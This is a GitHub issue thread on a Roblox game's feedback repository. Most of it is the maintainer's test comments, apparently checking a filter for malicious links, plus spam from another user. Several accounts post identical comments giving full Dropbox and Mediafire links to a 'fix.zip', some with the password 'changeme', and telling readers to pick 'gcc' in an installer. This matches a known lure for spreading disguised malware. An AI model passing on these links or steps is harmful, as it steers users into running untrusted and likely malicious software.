### ISSUE TITLE
[BUG]: Test Issue

### ISSUE THREAD

**Issue by HooferDevelops** [typical-developers/oaklands-feedback#880]
### Roblox Username

Test Issue

### What version did this issue occur in?

1.0.0

### Describe the issue in detail.

Test Issue

### Provide some images / videos of the issue in action.

Test Issue

### Before Submitting

- [X] I have confirmed that nobody else reported this issue.
- [X] The details of this report are legitimate.
- [X] I understand that I cannot be reimbursed here for in-game content I have lost.

**Comment by HooferDevelops** [comment]
Test Comment 2.

dropbox.com

Test 2.

**Comment by HooferDevelops** [comment]
Test Comment 3.

dropbox.com

Test 3.

**Comment by GendiAstaNugraha** [comment]
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1
In the installer menu, select "gcc."

**Comment by seeronline** [comment]
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1
In the installer menu, select "gcc."

**Comment by HooferDevelops** [comment]
Test Comment 5.

dropbox.com

Test 5.

**Comment by Wanderx13** [comment]
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1
In the installer menu, select "gcc."

**Comment by HooferDevelops** [comment]
Test Comment 125.

mediafire.com

**Comment by HooferDevelops** [comment]
Test Comment 126

**Comment by LuckFire** [comment]
SHUT UP

**Comment by LuckFire** [comment]
SHUT UP

**Comment by LuckFire** [comment]
OH MY GOD

**Comment by LuckFire** [comment]
BE QUIET

**Comment by HooferDevelops** [comment]
Test

**Comment by HooferDevelops** [comment]
Test 1

**Comment by HooferDevelops** [comment]
Test 2 dropbox

**Comment by HooferDevelops** [comment]
Test 3 dropbox.com

**Comment by LuckFire** [comment]
Test 727 Test 727 Test 727 Test 727 Test 727 Test 727 Test 727 Test 727 Test 727 Test 727 Test 727 Test 727 Test 727 Test 727 Test 727 Test 727 Test 727 Test 727 Test 727 Test 727 Test 727 Test 727 Test 727 Test 727 Test 727 Test 727 Test 727 Test 727 Test 727 Test 727 Test 727 Test 727 Test 727 Test 727 Test 727 Test 727 Test 727 Test 727 Test 727 Test 727 Test 727 Test 727 Test 727 Test 727 Test 727 Test 727 Test 727 Test 727 Test 727 Test 727 Test 727 Test 727 Test 727 Test 727 Test 727 Test 727 Test 727 Test 727 Test 727 Test 727 Test 727 Test 727 Test 727 Test 727 Test 727 Test 727 Test 727 Test 727 Test 727 Test 727 Test 727 Test 727 Test 727 Test 727 Test 727 Test 727 Test 727 Test 727 Test 727 Test 727 Test 727 Test 727 Test 727 Test 727 Test 727 Test 727 Test 727 Test 727 Test 727 Test 727

**Comment by LuckFire** [comment]
https://www.dropbox.com/

**Comment by HooferDevelops** [comment]
Test comment :)

**Comment by HooferDevelops** [comment]
Test Comment 2 :)

**Comment by HooferDevelops** [comment]
Safe Comment

**Comment by HooferDevelops** [comment]
Unsafe Comment
dropbox.com

**Comment by HooferDevelops** [comment]
Test

**Comment by HooferDevelops** [comment]
Test15

**Comment by HooferDevelops** [comment]
Bad link!
mediafire.com

**Comment by HooferDevelops** [comment]
Final comment hopefully. Should look exactly how it used to look :D No more malicious URLs here, bucko!

**Comment by HooferDevelops** [comment]
Here's an example of a malicious URL:
dropbox.com

**Comment by HooferDevelops** [comment]
Final comment hopefully. Should look nearly exact to how it used to look :D No more malicious URLs here, bucko!

**Comment by HooferDevelops** [comment]
Here's an example of a malicious URL:
dropbox.com

**Comment by esttemanb** [comment]
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1
In the installer menu, select "gcc."

**Comment by esttemanb** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by esttemanb** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by kyy23** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by kyy23** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by sunshinezxq** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."
